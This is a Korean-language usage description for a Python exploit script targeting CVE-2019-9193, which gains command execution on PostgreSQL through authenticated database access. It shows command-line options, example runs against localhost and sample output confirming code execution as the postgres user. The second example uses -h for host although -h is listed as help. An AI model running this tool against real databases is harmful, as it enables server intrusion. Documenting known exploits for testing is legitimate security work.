
CVE-2019-9193용 Python 익스플로잇 스크립트로, 인증된 명령 주입을 통해 취약한 PostgreSQL 데이터베이스에서 원격 코드 실행을 가능하게 합니다.
사용법: CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]
예시: python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'
예시 2 : python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'
출력:
[+] 127.0.0.1:5432의 PostgreSQL 데이터베이스에 연결 중 [+] 데이터베이스 연결이 수립됨 [+] PostgreSQL 버전 확인 중 [+] PostgreSQL 9.3은 취약할 가능성이 높음 [+] 테이블 _30e173ba7fa5577a86b9e9ecfea13360 생성 중 [+] 명령 실행됨
uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)
[+] 테이블 _30e173ba7fa5577a86b9e9ecfea13360 삭제 중